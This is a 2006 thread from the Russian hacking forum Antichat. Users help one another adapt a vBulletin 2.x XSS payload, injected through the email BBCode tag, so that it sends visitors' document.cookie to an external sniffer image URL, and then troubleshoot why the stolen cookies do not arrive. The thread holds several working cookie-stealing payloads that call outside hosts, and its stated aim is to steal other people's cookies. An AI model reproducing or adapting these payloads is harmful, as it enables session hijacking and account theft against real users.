Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   vBulletin 2.*.* - XSS (https://forum.antichat.xyz/showthread.php?t=28225)

}{0TT@БЬ)Ч 30.11.2006 02:19
vBulletin 2.*.* - XSS
 
есть код [E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss)); помогите переделать под другой снифер или объясните что тут менять?

Вот под этот
Адрес картинки-сниффера:
http://www.snif.ru/snif/s.gif?id=102

что бы украсть чьи-то cookies, то код должен быть примерно таким:

<script>img=new Image(); img.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;</script>

InferNo23 30.11.2006 09:57
хм..

Код:
[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;this.sss=null" style=top:expression(eval(this.sss));

}{0TT@БЬ)Ч 30.11.2006 22:31
в том то и дело что так я уже пробовал и ни че не пришло на снифер но на ачатовский приходит походу дело в снифере может кто скажет в чем может быть разница?

genom-- 30.11.2006 22:47
если мне память не изменяет то эта xss уже описывалась давно -- там стоит ограничение на строку с мылом в 60 символов --- поэтому твой скрипт обрезает

}{0TT@БЬ)Ч 30.11.2006 23:33
форум то скрипт нормально проглатывает, чето я не понял на ачатовский снифак же куки приходят.


Время: 17:55